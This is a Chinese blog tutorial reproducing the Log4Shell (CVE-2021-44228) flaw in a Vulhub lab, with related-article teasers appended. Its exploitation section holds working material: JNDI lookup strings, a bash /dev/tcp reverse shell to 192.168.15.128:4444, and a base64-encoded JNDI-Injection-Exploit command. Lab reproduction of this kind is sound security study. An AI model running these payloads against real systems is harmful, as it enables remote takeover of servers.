Log4j2远程代码执行漏洞(CVE-2021-44228)

最新推荐文章于 2025-05-26 21:51:08 发布
原创 最新推荐文章于 2025-05-26 21:51:08 发布 · 3.5k 阅读 · 31 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#log4j #web安全 #安全

这篇文章详细解释了Log4Shell漏洞,涉及其原理、影响的ApacheLog4j2版本,以及如何在Vulhub环境中搭建并验证漏洞。作者介绍了使用burp插件检测漏洞的方法,并演示了漏洞利用的过程,最后给出官方推荐的修复建议。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

1、简介

CVE-2021-44228,被广泛称为“Log4Shell”,是一个高危的远程代码执行漏洞,影响了Apache Log4j 2,这是一个在Java应用程序中广泛使用的日志记录库。

2、漏洞原理

这个漏洞的根本原因在于Log4j 2的日志消息查找功能,该功能允许插入特定的模式,以便从不同的数据源动态获取信息。攻击者可以通过向Log4j传递一个恶意构造的字符串操纵JNDI(Java Naming and Directory Interface)查找,以执行LDAP(轻量级目录访问协议)或其他JNDI支持的查询。例如,攻击者可以提交一个包含${jndi:ldap://attacker_controlled_server/payload}的字符串到日志消息中。如果这个消息被记录,Log4j会尝试解析这个字符串,并进行JNDI查询到指定的URL,这可以导致加载并执行攻击者指定的恶意代码。

3、影响版本

Apache Log4j 2.x < 2.15.0-rc2

4、环境搭建

本文用到的是Vulhub搭建的环境,如何下载Vulhub并启动可参考这里

进入到CVE-2021-44228目录,执行如下命令启动环境。

docker-compose up -d

查看环境信息

docker-compose ps

浏览器访问搭建环境的IP加端口,出现以下界面证明搭建成功。

5、漏洞验证

本文漏洞验证用的是burp插件Log4j2Scan,插件地址

本文是之前安装好的,简单说一下如何安装。

配置Log4j2Scan插件响应地址为CEYE的,如无账号,注册即可,将CEYE生成的地址与API Token填写至插件中并应用。

浏览器与burp链接后在整个存在漏洞的界面随意点点(主要是为了找到注入点),Log4j2Scan插件告警存在远程命令执行漏洞。

手动验证,将存在漏洞的数据包重新发送,CEYE有回显,证明漏洞的确存在。

6、漏洞利用

首先下载JNDI注入工具,git clone https://github.com/welk1n/JNDI-Injection-Exploit.git 

进入JNDI-Injection-Exploit目录,执行如下命令进行编译。

mvn clean package -DskipTests

构造反弹shell命令,并进行base64编码。编码地址

 bash -i >& /dev/tcp/192.168.15.128/4444 0>&1

进入JNDI-Injection-Exploit/target目录执行如下命令,获取payload。

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE1LjEyOC80NDQ0IDA+JjE=}|{base64,-d}|{bash,-i}" -A "192.168.15.128"

另起一个终端监听4444端口(反弹命令中的端口是多少,就监听多少就行)

将构造好的恶意类带入到url中访问

LDAP服务器收到回显,同样监听处成功反弹shell。

7、修复建议

官网下载不受影响的版本,及时更新。

https://logging.apache.org/log4j/2.x/download.html

网安-Dream
关注
log4j2 远程代码执行漏洞复现(CVE-2021-44228
2301_76631050的博客
08-01 1234
Apache Log4jApache的开源项目,一个功能强大的日志组件,提供方便的日志记录Apache Log4j2:对Log4j的升级,它比其前身Log4j1.x提供了重大改进,并提供了Logback中可用的许多改进,同时修复了Loqback架构中的一些问题。优秀的Java日志框架;Log4j2 漏洞受影响版本:2.0到2.14.1版本中存在一处JNDI注入漏洞
idea中使用log4j2打印日志
ygd1994的专栏
05-24 1万+
先去下载log4j的jar包,将log4j-api-2.8.2.jar和log4j-core-2.8.2.jar导入到lib目录自定义log4j2.xml文件到src目录下 配置文件如下: <?xml version="1.0" encoding="UTF-8"?> <!-- status : 这个用于设置log4j2自身内部的信息输出,可以不设置,当设置成trace时,会看到log4j2
Apache Log4j2漏洞 (CVE-2021-44228) 分析与复现
热门推荐
未完成的歌~的博客
03-15 1万+
Apache Log4j2 是一个开源的 Java 日志记录工具。Log4j2Log4j 的升级版本,其优异的性能被广泛的应用于各种常见的 Web 服务中。Log4j2 在特定的版本中由于启用了 lookup 功能,导致存在 JNDI 漏洞。lookup 函数是用于在日志消息中替换变量的函数,是通过配置文件中的${}语法调用的,例如:如果在日志消息中使用了,那么 log4j2 将使用 lookup 函数从系统属性中查找名为 “my.property” 的属性值,并将其替换为实际值。
CVE-2021-44228源码分析与漏洞复现
最新发布
spinage的博客
05-26 1382
Apache Log4j2 远程代码执行漏洞CVE-2021-44228)是影响2.0-beta9至2.14.1版本的高危漏洞(CVSS 10.0)。该漏洞源于Log4j2的消息查找功能未对用户输入进行安全过滤,允许攻击者通过构造包含恶意JNDI查询的日志消息(如${jndi:ldap://attacker.com/Exploit})触发远程代码执行漏洞触发流程包括:1)用户输入被记录到日志;2)MessagePatternConverter解析消息中的占位符;3)StrSubstitutor处理动态内
Apache Log4j2 远程代码执行漏洞 2.15.0(CVE-2021-44228)
weixin_44047654的博客
01-09 3523
Apache Log4j2 远程代码执行漏洞< 2.15.0(CVE-2021-44228)
log4j2 CVE-2021-44228 远程代码执行漏洞
读书 买花 长大
05-17 1230
CVE-2021-44228
Apache Log4j 远程代码执行漏洞(CVE-2021-44832)
10-25
Apache Log4j 是一个广泛使用的 Java 日志框架,它允许应用...总之,Apache Log4j 远程代码执行漏洞是一个重大安全事件,强调了在软件开发和运维过程中对安全性的重视。及时更新和维护软件库是防止此类漏洞影响的关键。
Log4j2 远程代码执行漏洞CVE-2021-44228
qq_68163788的博客
06-18 1596
Apache Log4j2是一个基于Java的日志记录工具,当前被广泛应用于业务系统开发,开发者可以利用该工具将程序的输入输出信息进行日志记录。CVE-2021-44228Log4j2中存在的一个严重的远程代码执行漏洞。攻击者可以通过恶意构造的日志信息,利用该漏洞执行恶意代码,从而危害受影响的系统。这个漏洞对于使用Log4j2的应用程序和系统构成了潜在的安全风险。
log4j2远程代码执行漏洞CVE-2021-44228
流水不争先,争的是滔滔不绝
05-22 453
log4j2远程代码执行漏洞
CVE-2021-44228 Log4j2 远程代码执行漏洞
震山的博客
08-23 827
简单分析,扯不上深度,还望大佬指正
Apache Log4j2远程代码执行漏洞CVE-2021-44228
Arlo的博客
12-30 1722
发布日期:2021-12-12 名称:Apache Log4j2 Remote Code Execution Vulnerability (CVE-2021-44228) 级别:严重 描述信息:Apache Log4j2是一个基于Java的日志记录工具,是Log4j的升级,在其前身Log4j 1.x基础上提供了Logback中可用的很多优化,同时修复了Logback架构中的一些问题,是目前最优秀的Java日志框架之一。该日志框架被大量用于业务系统开发,用来记录日志信息。开发者可能会将用户输入造成的错误信息写
CVE-2021-44228 Apache Log4j2 远程代码执行漏洞复现
热爱学习,喜欢折腾!
09-03 4682
Apache Log4j2Apache 软件基金会下的一个开源的基于 Java 的日志记录工具。Log4j2 是一个 Log4j 1.x 的重写,并且引入了大量丰富的特性。该日志框架被大量用于业务系统开发,用来记录日志信息。由于其优异的性能而被广泛的应用于各种常见的 Web 服务中。apache log4j通过定义每一条日志信息的级别能够更加细致地控制日志生成地过程,受影响地版本中纯在JNDI注入漏洞,导致日志在记录用户输入地数据时,触发了注入漏洞,该漏洞可导致远程代码执行,且利用条件低,影响范围广。
CVE-2021-44228 Apache Log4j 2 远程代码执行漏洞(反弹shell)
PolarPeak的博客
12-10 5398
本地复现 https://github.com/tangxiaofeng7/apache-log4j-poc log4j.java内容 import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; public class log4j { private static final Logger logger = LogManager.getLogger(log4j.class);
Log4j2远程命令执行(CVE-2021-44228
weixin_48817799的博客
01-25 1215
Log4j2远程命令执行(CVE-2021-44228) 前言一、vulfocus靶场二、复现步骤1.靶场如下2.点击抓包 前言 Apache Log4j2 是一个基于 Java 的日志记录工具。该工具重写了 Log4j 框架,并且引入了大量丰富的特性。该日志框架被大量用于业务系统开发,用来记录日志信息。 在大多数情况下,开发者可能会将用户输入导致的错误信息写入日志中。攻击者利用此特性可通过该漏洞构造特殊的数据请求包,最终触发远程代码执行。 一、vulfocus靶场 http://vulfocus.io.
Apache Log4j2 远程代码执行漏洞(CVE-2021-44228)
weixin_68177269的博客
09-27 637
log4j就会去解析该信息,通过jndi的lookup() 方法去解析该url:ldap:attacker:1099/exp。受害主机访问伪造的ldap服务,访问恶意java.class类,执行恶意代码。如果ldap没有解析成功会自动访问http。当用户输入信息时,应用程序中的log4j 2组件会将信息记录到日志中。条件:lookup()参数可控。假如日志中包含有语句。
Apache Log4j2远程代码执行漏洞CVE-2021-44228漏洞复现
weixin_51804748的博客
03-18 7093
这里写自定义目录标题欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 欢迎使用Markdown编辑器 你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学习如何使用Mar
Apache Log4j2远程代码执行漏洞
F2444790591的博客
07-08 8293
1、下载、解压、重命名vulhub-master.zip为vulhub 2、进入漏洞环境下,启动该环境。 3、访问目标靶场: 4、在Dnslog.cn中生成接收信息的域名 。 5、提交dnslog payload 参数,进行访问。 6、可以发现dnslog接收到返回的信息,证明存在log4
Apache Log4j2远程代码执行漏洞CVE-2021-44228)复现
qq_40640917的博客
01-10 2649
Apache Log4j2 存在远程代码执行漏洞,该漏洞是由于Apache Log4j2某些功能存在递归解析功能,未经身份验证的攻击者通过发送特定恶意数据包,可在目标服务器上执行任意代码。Apache Log4j2是一个开源的Java日志框架,被广泛地应用在中间件、开发框架与Web应用中。攻击机参数:Kali(或安装有msfconsole的任意Linux/Windows操作系统)靶机容器:vulfocus/log4j2-rce-2021-12-09。靶机参数:Centos8.1。
cve-2021-44228
01-07
### CVE-2021-44228 漏洞详情 CVE-2021-44228 是指在 Log4j 2.x 版本中存在的严重安全漏洞,允许攻击者通过精心构造的日志输入实现远程代码执行 (RCE)[^3]。具体来说,当应用程序日志记录含有特定模式的字符串时,Log4j 尝试解析并处理 JNDI 查询语句,这可能导致连接到由攻击者控制的服务端点,并加载恶意 Java 类文件。 #### 影响范围 受影响版本包括但不限于 Log4j 2.0 至 2.14.1 版本之间的所有发行版。 ### 技术细节 此漏洞利用了 Java 命名和目录接口(JNDI),它通常用于定位分布式资源和服务。如果配置不当或存在未受保护的环境变量,则可能被用来发起针对内部网络基础设施或其他系统的攻击。一旦成功触发 RCE 条件,攻击者就能完全控制系统,安装程序、查看/修改数据甚至创建新账户等操作均成为可能。 ### 复现过程概述 为了验证该漏洞的存在以及理解其工作原理,研究人员常会在隔离环境中设置实验场景来重现问题。例如,在 vulhub 靶场上按照指定路径 `/home/vulhub-master/log4j/CVE-2021-44228` 启动相关服务后,可以通过模拟发送包含特殊字符组合的日志条目给目标应用来进行测试[^2]。 另外也有开发者分享了自己的学习笔记,提供了详细的步骤指导如何构建类似的测试案例,比如使用 `bkfish/Apache-Log4j-Learning` 工具集辅助完成整个流程中的各个环节,从准备必要的依赖项到最后分析结果都进行了详尽描述[^4]。 ### 修复建议 对于已经部署的应用程序而言,最直接有效的措施是尽快升级至最新稳定的安全补丁级别——即至少更新为 Log4j 2.15.0 或更高版本。除此之外: - **移除不必要的功能模块**:禁用任何不使用的特性特别是那些涉及动态查找机制的功能; - **严格审查外部输入源**:确保所有来自用户的输入都被充分过滤净化后再参与任何形式的数据交互活动; - **加强监控力度**:定期扫描现有系统是否存在异常行为迹象以便及时响应潜在威胁事件的发生。 ```bash # 更新命令示例 mvn dependency:update -DgroupId=org.apache.logging.log4j \ -DartifactId=log4j-core \ -Dversion=2.17.1 # 替换成最新的安全版本号 ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值